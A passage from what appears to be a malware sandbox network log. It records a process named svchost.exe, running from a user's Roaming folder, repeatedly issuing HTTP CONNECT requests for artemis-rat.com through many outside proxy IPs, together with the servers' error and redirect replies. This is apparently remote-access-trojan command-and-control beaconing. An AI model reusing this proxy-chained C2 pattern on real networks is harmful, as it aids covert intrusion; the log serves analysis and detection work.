Mar 9, 2024 13:14:32.155690908 CET	1286	IN	Data Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?'>#ZB-z6=`9cxN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
Mar 9, 2024 13:14:32.155730009 CET	736	IN	Data Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_\|W&o[Fh7okz7%QhIZ
Mar 9, 2024 13:14:32.217601061 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 49 3f 68 06 9f e2 75 e7 93 03 ab e7 dd 5e 78 36 1f da 85 a7 14 ac a5 51 a4 a1 36 ac e0 44 74 02 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 72 04 46 0d 2f b5 12 d8 61 4a 61 f0 fa d3 6b 56 ac 93 26 19 11 Data Ascii: %! I?hu^x6Q6Dt(rF/aJakV&Fy\&o
Mar 9, 2024 13:14:32.708590031 CET	258	IN	Data Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 5a 17 6c fc 96 79 f4 13 45 84 8d 90 63 af ff 94 97 5b 49 d7 e9 a4 8f c5 36 0b f1 e1 d9 05 8c e3 cf f2 3f e5 cd bc 32 46 86 1b ec 1d ce fa 6d ee 71 e7 6c 3f eb 92 6a 2e fd 9c 40 5e e3 02 44 ea 31 41 ca Data Ascii: ZlyEc[I6?2Fmql?j.@^D1AmFZZ7Odz%<-\>MscL)aVLT0rK-V}D(dpwW`'A9n(r?B}
Mar 9, 2024 13:14:32.712955952 CET	252	OUT	Data Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 05 6a 4a 01 ab 3c 2e 46 4d 4c 01 d1 94 d1 72 10 f1 34 b0 fe 2e 53 9e fb fc 6b b1 d2 f0 97 6a 91 d2 70 6b 59 3a a1 a7 e0 2a b9 0a f0 2c 01 a3 06 be e2 2c bd 05 54 ad 15 d0 0b f1 5e 66 9f c3 96 21 1b 66 e7 65 Data Ascii: jJ<.FMLr4.SkjpkY:,,T^f!fekZHF=xeL73Mma5&Yz6HVd8q\Uod;Rb$O)Vf+)]g+:G 6E-(jq"y(/>ACBh;m
Mar 9, 2024 13:14:33.216023922 CET	1286	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 95 15 fe a8 be e0 91 fb d6 39 52 34 3d f5 53 83 07 ff 78 a8 e5 19 be ee b5 c1 22 46 75 9e 7e 2a 73 2c 80 65 73 a1 25 70 be 0e d8 e6 1d 94 f1 2a 02 fe e9 96 fa 90 df 8c 5a 4f b2 bd a6 a0 a6 e4 b3 c3 3f f3 d6 Data Ascii: q9R4=Sx"Fu~s,es%pZO?2MHat5kuv_m"L=5Fuq1#W >Z!,Z\|zp$kt$dggVInRcyzj./qT]9re_M
Mar 9, 2024 13:14:33.216080904 CET	1286	IN	Data Raw: fe 25 27 48 55 80 02 c8 5c 42 f1 09 1b 84 9a 5a f8 54 e5 4f 1e 46 a5 ba ff 20 01 87 9f f2 18 b8 2e c8 81 80 44 cc aa 08 31 3b 82 ab 63 d8 32 df b9 39 90 7e 0a 72 22 bf 38 69 1e 7c 01 51 55 4a 19 88 43 b5 35 2c b1 82 db df 29 1c 87 24 9d 3e ba 8a Data Ascii: %'HU\BZTOF .D1;c29~r"8i\|QUJC5,)$><<C"(!2_2s[f6qOM&1{?q$+$o8v!'a\yNF-86cE![GDoVum,^I%E]>5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2159	192.168.2.5	56921	104.17.171.79	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.041390896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.195820093 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2160	192.168.2.5	56678	93.90.212.2	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.041457891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2161	192.168.2.5	56740	18.185.169.150	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.041486025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.346529961 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:29 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2162	192.168.2.5	56929	185.238.228.202	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.041569948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.196398020 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2163	192.168.2.5	56864	184.60.66.122	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.041570902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.273294926 CET	1286	IN	HTTP/1.1 302 Found Date: Sat, 09 Mar 2024 12:14:29 GMT Server: Apache/2.4.56 (Debian) Location: https://artemis-rat.com:443/index.php Content-Length: 3214 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 50 20 43 6f 6d 70 75 74 69 6e 67 20 43 6f 6e 63 65 70 74 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6c 69 62 2f 64 70 63 63 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 55 62 75 6e 74 75 3a 34 30 30 2c 33 30 30 2c 37 30 30 2c 35 30 30 2c 34 30 30 69 74 61 6c 69 63 25 37 63 44 69 64 61 63 74 2b 47 6f 74 68 69 63 3a 73 75 62 73 65 74 3d 6c 61 74 69 6e 2d 65 78 74 25 37 63 4d 75 6c 69 3a 34 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 33 30 30 69 74 61 6c 69 63 2c 33 30 30 25 37 63 41 6d 69 6b 6f 3a 34 30 30 2c 37 30 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 42 6d 45 34 6b 57 42 71 37 38 69 59 68 46 6c 64 76 4b 75 68 66 54 41 55 36 61 75 55 38 74 54 39 34 57 72 48 66 74 6a 44 62 72 43 45 58 53 55 31 6f 42 6f 71 79 6c 32 51 76 5a 36 6a 49 57 33 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 6b 61 37 53 6b 30 47 6c 6e 34 67 6d 74 7a 32 4d 6c 51 6e 69 6b 54 31 77 58 67 59 73 4f 67 2b 4f 4d 68 75 50 2b 49 6c 52 48 39 73 45 4e 42 4f 30 4c 52 6e 35 71 2b 38 6e 62 54 6f 76 34 2b 31 70 22 0d Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="MobileOptimized" content="width"/> <meta name="HandheldFriendly" content="true"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon"/> <title>DP Computing Concepts</title> <link rel="stylesheet" href="/lib/dpcc.css"> <link href="https://fonts.googleapis.com/css?family=Ubuntu:400,300,700,500,400italic%7cDidact+Gothic:subset=latin-ext%7cMuli:400,400italic,300italic,300%7cAmiko:400,700" media="all" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"></head><body> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
Mar 9, 2024 13:14:29.275366068 CET	1286	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 Data Ascii: crossorigin="anonymous"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><header> <div class="row mt-2"> <div class="col-sm-auto"> <a href="http:
Mar 9, 2024 13:14:29.276684046 CET	844	IN	Data Raw: 69 6e 67 20 62 61 73 69 63 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 61 6c 20 63 6f 6e 64 69 74 69 6f 6e 73 20 66 6f 72 20 67 72 6f 77 69 6e 67 20 0d 0a 20 61 67 72 69 63 75 6c 74 75 72 61 6c 20 70 72 6f 64 75 63 74 73 20 73 75 63 68 20 61 73 20 67 72 Data Ascii: ing basic environmental conditions for growing agricultural products such as grapes. These sensors are capable of remotely monitoring temperature, humidity, light levels, and soil moisture levels. The sensor readings are transmitted wire

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2164	192.168.2.5	56870	142.93.196.242	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.042049885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.676857948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.380702972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880522013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.548304081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.254093885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2165	192.168.2.5	56952	172.67.182.22	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.042845011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.200134993 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2166	192.168.2.5	56754	123.126.158.50	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.043940067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2167	192.168.2.5	56748	94.45.74.60	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.044037104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2168	192.168.2.5	56793	46.101.186.238	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.044559002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.628246069 CET	806	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:29 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 614 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2169	192.168.2.5	56760	43.131.248.165	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.044743061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2170	192.168.2.5	55649	43.255.113.232	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.045103073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.397716999 CET	208	IN	HTTP/1.0 404 Not Found Server: HCS Date: Sat, 09 Mar 2024 15:01:55 GMT Content-Type: text/html Content-Length: 432 HCS-Error: ERR_FTP_NOT_FOUND 0 X-NGAA: MISS from CH-XW-NO1-315.1 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2171	192.168.2.5	56819	147.75.34.85	10007	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.045712948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.347167969 CET	356	IN	HTTP/1.0 502 Bad Gateway Server: Zscaler/6.3 Content-Type: text/html Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2172	192.168.2.5	56976	104.16.105.198	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
